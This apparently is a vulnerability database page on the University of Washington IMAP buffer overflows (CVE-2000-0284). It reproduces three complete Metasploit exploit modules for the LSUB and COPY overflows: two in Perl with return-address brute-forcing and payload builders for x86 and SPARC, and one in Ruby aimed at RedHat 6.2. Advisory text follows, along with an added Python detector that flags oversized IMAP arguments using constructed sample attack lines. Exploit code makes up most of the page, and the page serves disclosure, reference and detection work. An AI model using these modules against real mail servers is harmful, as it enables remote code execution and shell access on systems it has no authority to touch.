package Msf::Exploit::uow_imap4_lsub;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };
my $info =
{
	'Name'  => 'University of Washington IMAP4 LSUB Overflow',
	'Version'  => '$Revision: 1.18 $',
	'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
	'Arch'  => [ 'x86', 'sparc' ],
	'OS'    => [ 'bsd', 'linux' ],
	'Priv'  => 0,
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 143],
		'USER'  => [1, 'DATA', 'User name'],
		'PASS'  => [1, 'DATA', 'Password'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	},
	'Payload' => {
		'Space'  => 680,
		'MinNops'=> 400,
		'BadChars'  => "\x00/",
		'Keys'   => ['+findsock', '+inetd'],
	},
	'Description'  => Pex::Text::Freeform(qq{
		This exploits a buffer overflow in the LSUB command. An overly long
		argument causes a classic stack buffer overflow.
	}),
	'Refs'  =>  [  
		['BID', 1110],
		['OSVDB', 12037],
	],
	'Targets' => [ 
		[ "Linux / x86 stack bruteforce", 0, 0xbffffdfc, 0xbfa00000, 400, 1064, \&Payloadx86 ],
		[ "FreeBSD / x86 stack bruteforce", 0, 0xbfbffdfc, 0xbf100000, 400, 1064, \&Payloadx86 ],
		[ "Linux+FreeBSD+NetBSD / x86 heap bruteforce", 1, 0x0804d000, 0x081f0000, -400, 1064, \&Payloadx86 ],
# These 2 could be consolidated and you'd get 5-6 useless hits on Linux but it's better this way.
		[ "Linux / sun4m stack bruteforce", 0, 0xefffeca0, 0xefa00000, 748, 1104, \&PayloadSPARC ],
		[ "NetBSD / sun4m stack bruteforce", 0, 0xeffffca0, 0xefa00000, 748, 1104, \&PayloadSPARC ],
		[ "OpenBSD / sun4m stack bruteforce", 0, 0xf7fffca0, 0xf7a00000, 748, 1104, \&PayloadSPARC ],
	],
	'Keys'  => ['imap'],
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;

	my $target = $self->Targets->[$target_idx];

	my $curr_ret;

	$self->PrintLine(sprintf("[*] Starting bruteforce mode for target %s.", $target->[0]));

	for (
		$curr_ret  = $target->[2];
		($target->[1] == 0 && $curr_ret >= $target->[3]) || ($target->[1] == 1 && $curr_ret <= $target->[3]);
		$curr_ret -= $target->[4]
	)
	{
		if(!($curr_ret & 0xff) || ($curr_ret & 0xff) == 0x20)
		{
			$curr_ret += 4;
		}
		if(!($curr_ret & 0xff00) || ($curr_ret & 0xff00) == 0x2000)
		{
			$curr_ret -= 0x0100;
		}

		my $s = Login($self);
		if($s == -1)
		{
			return;
		}

		$self->PrintLine(sprintf("[*] Trying return address 0x%.8x...", $curr_ret));
		$s->Send(sprintf("1 LSUB \"\" {%i}\r\n", $target->[5]));
		$s->Recv(-1);
		$s->Send($target->[6]->($curr_ret, $shellcode) . "\r\n");

		$self->Handler($s);
		$s->Close();
		undef($s);
	}

	return;
}

sub Check {
	my $self = shift;

	my $s = Login($self);
	if($s == -1)
	{
		return;
	}

	$s->Send("1 LSUB \"\" {1096}\r\n");
	$s->Recv(-1);
	$s->Send(Pex::Text::AlphaNumText(1096) . "\r\n");
	my $reply = $s->Recv(-1);

	if(!$reply)
	{
		$self->PrintLine("[*] Vulnerable server.");
		return $self->CheckCode('Confirmed');
	}

	$self->PrintLine("[*] Server is probably not vulnerable.");
	return $self->CheckCode('Safe');
}



sub Login {
	my $self = shift;

	my $user = $self->GetVar('USER');
	my $pass = $self->GetVar('PASS');

	my $sock = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $self->GetVar('RHOST'), 
		'PeerPort'  => $self->GetVar('RPORT'), 
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	);
	if ($sock->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
		return -1;
	}

	$sock->Recv(-1);
	$sock->Send(sprintf("1 LOGIN \"%s\" \"%s\"\r\n", $user, $pass));
	my $reply = $sock->Recv(-1);
	if(!$reply || $reply !~ /1 OK/)
	{
		$self->PrintLine('[*] Authentication failed.');
		return -1;
	}
	undef($reply);

	return $sock;
}

sub Payloadx86 {
	my $ret = shift;
	my $sc = shift;

	my $buf;

# XXX: More precise.
	$buf = $sc . pack("V", $ret) x 96;

	return $buf;
}

sub PayloadSPARC {
	my $ret = shift;
	my $sc = shift; 

	my $buf;

	$buf = substr($sc, 0, 1032 - 680) . $sc . pack("N", $ret - 32) x 15 . pack("N", $ret) x 3;

	return $buf;
}

- Vulnerability information (19849)

UoW imapd 10.234/12.264 COPY Buffer Overflow (meta) (EDBID:19849)
Platform: unix  Type: remote
Date: 2000-04-16  Verified
Port: 0  Author: vlad902
source: http://www.securityfocus.com/bid/1110/info

##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::uow_imap4_copy;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced =
{
	'AlignPayload' => [1, 'What boundary to align on'],
};
my $info =
{
	'Name'  => 'University of Washington IMAP4 COPY Overflow',
	'Version'  => '$Revision: 1.17 $',
	'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
	'Arch'  => [ 'x86', 'sparc' ],
	'OS'    => [ 'bsd', 'linux' ],
	'Priv'  => 0,
	'UserOpts'  => {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 143],
		'USER'  => [1, 'DATA', 'User name'],
		'PASS'  => [1, 'DATA', 'Password'],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
	},
	'Payload' => {
		'Space' => 1000,
		'MinNops' => 700,
		'BadChars' => "\x00/",
		'Keys' => ['+findsock', '+inetd'],
	},
	'Description'  => Pex::Text::Freeform(qq{
		This exploits a buffer overflow in the COPY command. An overly long
		argument causes a classic stack buffer overflow.

		Snort's imap.rules detects the LIST, RENAME, LSUB, and FIND overflows 
		but does not catch COPY (12/10/04).
	}),
	'Refs'  =>  [  
		['BID', 1110],
		['OSVDB', 12037],
	],
	'Targets' => [ 
		[ "Linux / x86 stack bruteforce", 0xbffffcd0, 0xbfa00000, 700, 1096, \&Payloadx86 ],
		[ "FreeBSD / x86 stack bruteforce", 0xbfbffcd0, 0xbf100000, 700, 1096, \&Payloadx86 ],
# These 2 could be consolidated and you'd get 5-6 useless hits on Linux but it's better this way.
		[ "NetBSD / sun4m stack bruteforce", 0xeffffcd0, 0xefa00000, 720, 1084, \&PayloadSPARC ],
		[ "Linux / sun4m stack bruteforce", 0xefffecd0, 0xefa00000, 720, 1084, \&PayloadSPARC ],
		[ "OpenBSD / sun4m stack bruteforce", 0xf7fffca0, 0xf7a00000, 720, 1084, \&PayloadSPARC ],
	],
	'Keys'  => ['imap'],
};

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;

	my $target = $self->Targets->[$target_idx];
	my $curr_ret;

	if (! $self->InitNops(128))
	{
		$self->PrintLine("[*] Failed to initialize the nop module.");
		return;
	}
	
	$self->PrintLine(sprintf("[*] Starting bruteforce mode for target %s.", $target->[0]));

	for (
		$curr_ret  = $target->[1];
		$curr_ret >= $target->[2];
		$curr_ret -= $target->[3]
	)
	{
		if(!($curr_ret & 0xff) || ($curr_ret & 0xff) == 0x20)
		{
			$curr_ret += 4;
		}
		if(!($curr_ret & 0xff00) || ($curr_ret & 0xff00) == 0x2000)
		{
			$curr_ret -= 0x0100;
		}

		my $s = Login($self);
		if($s == -1)
		{
			return;
		}

		$self->PrintLine(sprintf("[*] Trying return address 0x%.8x...", $curr_ret));
		$s->Send(sprintf("1 UID COPY 1:2 {%i}\r\n", $target->[4] + 1));
		$s->Recv(-1);
		$s->Send(Pex::Text::AlphaNumText($self->GetVar('AlignPayload')) . $target->[5]->($self, $curr_ret, $shellcode) . "\r\n");

		$self->Handler($s);
		$s->Close();
		undef($s);
	}

	return;
}

sub Check {
	my $self = shift;

	my $s = Login($self);
	if($s == -1)
	{
		return;
	}

	$s->Send("1 UID COPY 1:2 {1096}\r\n");
	$s->Recv(-1);
	$s->Send(Pex::Text::AlphaNumText(1096) . "\r\n");
	my $reply = $s->Recv(-1);

	if(!$reply)
	{
		$self->PrintLine("[*] Vulnerable server.");
		return $self->CheckCode('Confirmed');
	}

	$self->PrintLine("[*] Server is probably not vulnerable.");
	return $self->CheckCode('Safe');
}


sub Login {
	my $self = shift;

	my $user = $self->GetEnv('USER');
	my $pass = $self->GetEnv('PASS');

	my $sock = Msf::Socket::Tcp->new
	(
		'PeerAddr'  => $self->GetVar('RHOST'), 
		'PeerPort'  => $self->GetVar('RPORT'), 
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	);
	if ($sock->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $sock->GetError);
		return -1;
	}

	$sock->Send(sprintf("1 LOGIN \"%s\" \"%s\"\r\n", $user, $pass));
	my $reply = $sock->Recv(-1);
	if(!$reply || $reply !~ /1 OK/)
	{
		$self->PrintLine('[*] Authentication failed.');
		return -1;
	}
	undef($reply);

# XXX: Create random dirname
	$sock->Send("1 CREATE MISC\r\n");
	$sock->Recv(-1);
	$sock->Send("1 SELECT MISC\r\n");
	$sock->Recv(-1);

	return $sock;
}


sub Payloadx86 {
	my $self = shift;
	my $ret = shift;
	my $sc = shift;

	my $buf;

# XXX: More precision.
	$buf = $sc . pack("V", $ret) x 24;

	return $buf;
}

sub PayloadSPARC {
	my $self = shift;
	my $ret = shift;
	my $sc = shift; 

	my $buf;

	$buf = $self->MakeNops(20) . $sc . pack("N", $ret) x 16;

	return $buf;
}

sub PayloadPrependEncoder {
	my $self = shift;
	my $target_idx  = $self->GetVar('TARGET');
	my $target = $self->Targets->[$target_idx];

	if($target->[0] =~ /x86/)
	{
		return "\x66\x81\xec\xe8\x03";
	}
	elsif($target->[0] =~ /sun4/)
	{
		return "\x9c\x23\xa3\xe8";
	}
}
		

- Vulnerability information (F82240)

UoW IMAP Server LSUB Buffer Overflow (PacketStormID:F82240)
2009-10-27 00:00:00
patrick  
exploit,overflow,imap
CVE-2000-0284

This Metasploit module exploits a buffer overflow in the 'LSUB' command of the University of Washington IMAP service. This vulnerability can only be exploited with a valid username and password.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Imap

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'UoW IMAP server LSUB Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the 'LSUB'
				command of the University of Washington IMAP service.
				This vulnerability can only be exploited with a valid username
				and password.
			},
			'Author'         => [ 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2000-0284' ],
					[ 'OSVDB', '12037' ],
					[ 'BID', '1110' ],
					[ 'URL', 'http://www.milw0rm.com/exploits/284' ],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 964,
					'BadChars' => "\x00\x0a\x0d",
					'StackAdjustment' => -3500,
					'Compat'   => 
						{
							'ConnectionType' => '-reverse',
						},
				},
			'Platform'       => 'linux',	
			'Targets'        => 
				[
					['RedHat 6.2 - IMAP4rev1 v12.264', { 'Ret' => 0xbffff310 }],
				],
			'DisclosureDate' => 'Apr 16 2000',
			'DefaultTarget' => 0))
	end

	def check
		connect
		disconnect

		if (banner =~ /IMAP4rev1 v12.264/)
			return Exploit::CheckCode::Vulnerable
		end
		return Exploit::CheckCode::Safe

	end

	def exploit
		connect_login

		print_status("Sending overflow string...")
		req = "a002 LSUB \"\" {1064}\r\n"
		sock.put(req)
		sleep(2)

		sploit = payload.encoded + rand_text_alphanumeric(64) + [target['Ret']].pack('V') + rand_text_alphanumeric(32) + "\r\n"

		sock.put(sploit)
		sleep(2)

		handler
		disconnect
	end

end

    

- Vulnerability information

OSVDB ID: 12037
Title: UoW imapd (UW-IMAP) Multiple Command Remote Overflows
Location: Remote / Network Access
Attack Type: Input Manipulation
Impact: Loss of Integrity
Solution: Upgrade
Exploit: Exploit Public
Disclosure: Third-party Verified

- Vulnerability description

A remote overflow exists in the University of Washington IMAP server. The IMAP server fails to verify the input length of arguments to the LIST, COPY, RENAME, FIND, and LSUB commands, resulting in buffer overflows. With a specially crafted request, an attacker can cause arbitrary code execution with the privileges of the user, resulting in a loss of integrity.
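As an added example that is not part of this database entry or of the exploit modules it reproduces, the check below inspects reconstructed client-to-server IMAP command lines for oversized arguments to the five commands named above. It covers both the `{N}` literal announcement the Metasploit modules send before the overflow string (the COPY form that the module's own description notes Snort's imap.rules did not catch at the time) and a long inline quoted string of the kind the original LIST report describes; the 512-byte threshold and the sample lines are assumptions, constructed here.

```python
import re
from typing import List, NamedTuple, Optional

# Commands this entry names as taking arguments whose length imapd did not check.
OVERFLOW_COMMANDS = {"LIST", "COPY", "LSUB", "RENAME", "FIND"}
# Assumed threshold: the modules above announce 1064-1097 byte arguments;
# legitimate mailbox names stay far below this.
MAX_ARG_BYTES = 512

# tag, optional UID prefix, command name, remaining arguments
_CMD_RE = re.compile(r"^(?P<tag>\S+)\s+(?:UID\s+)?(?P<cmd>[A-Za-z]+)\s*(?P<args>.*?)\s*$")
_LITERAL_RE = re.compile(r"\{(?P<n>\d+)\+?\}$")  # literal announcement ends the line
_QUOTED_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # inline quoted-string arguments

class Finding(NamedTuple):
    tag: str
    command: str
    arg_bytes: int
    kind: str  # "literal" (size announced up front) or "quoted" (inline string)

def inspect_line(line: str) -> Optional[Finding]:
    """Flag one client line that feeds an oversized argument to a listed command."""
    m = _CMD_RE.match(line.rstrip("\r\n"))
    if not m or m.group("cmd").upper() not in OVERFLOW_COMMANDS:
        return None
    tag, cmd, args = m.group("tag"), m.group("cmd").upper(), m.group("args")
    lit = _LITERAL_RE.search(args)
    if lit and int(lit.group("n")) > MAX_ARG_BYTES:
        return Finding(tag, cmd, int(lit.group("n")), "literal")
    longest = max((len(q) for q in _QUOTED_RE.findall(args)), default=0)
    if longest > MAX_ARG_BYTES:
        return Finding(tag, cmd, longest, "quoted")
    return None

def scan(lines: List[str]) -> List[Finding]:
    """Run inspect_line over a reconstructed client-to-server command stream."""
    return [f for f in map(inspect_line, lines) if f is not None]

# Constructed sample stream: the COPY and LSUB announcements the modules above
# send, a long inline LIST argument, and benign traffic (APPEND legitimately
# sends large literals and must not fire).
SAMPLE_LINES = [
    '1 LOGIN "alice" "secret"\r\n',
    "1 UID COPY 1:2 {1097}\r\n",
    'a002 LSUB "" {1064}\r\n',
    'a003 LIST "" "' + "A" * 1100 + '"\r\n',
    'a004 LIST "" "INBOX.*"\r\n',
    "a005 APPEND INBOX {2048}\r\n",
]
```

Running `scan(SAMPLE_LINES)` yields three findings (COPY and LSUB by announced literal size, LIST by inline string length) and ignores the APPEND literal, which is the false-positive case a size-only rule on `{N}` would hit.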

- Timeline

2000-04-16 Unknown
2000-04-16 Unknown

- Solution

Upgrade to imap-2000 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author

- Vulnerability information

Univ. Of Washington imapd Buffer Overflow Vulnerabilities
Class: Boundary Condition Error
Bugtraq ID: 1110
Remote: Yes
Local: No
Published: 2000-04-16 12:00:00
Updated: 2009-07-11 01:56:00
This vulnerability was posted to the Bugtraq mailing list on April 16, 2000 by Michal Zalewski <lcamtuf@tpi.pl>.

- Affected program versions

University of Washington imapd 12.264
- FreeBSD FreeBSD 4.0
- FreeBSD FreeBSD 3.4
- FreeBSD FreeBSD 3.3
- FreeBSD FreeBSD 3.2
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
University of Washington imapd 10.234

- Vulnerability discussion

A buffer overflow exists in imapd. The vulnerability exists in the list command. By supplying a long, well-crafted string as the second argument to the list command, it becomes possible to execute code on the machine.

Executing the list command requires an account on the machine. In addition, privileges have been dropped in imapd prior to the location of the buffer overrun. As such, this vulnerability would only be useful in a scenario where a user has an account, but no shell level access. This would allow them to gain shell access.

Overflows have also been found in the COPY, LSUB, RENAME and FIND commands. All of these, like the LIST command, require a login on the machine.

- Exploitation

Exploits have been released as part of the Metasploit Framework 2.3.

An exploit was contributed by Gabriel A. Maggiotti <gmaggiot@ciudad.com.ar>:

- Solution

This is a historical vulnerability database entry. Fixes may have been released which address this issue, however they may have not been included in the database. The analyst team will be retroactively updating the information in the vulnerability report.

- References

     

     
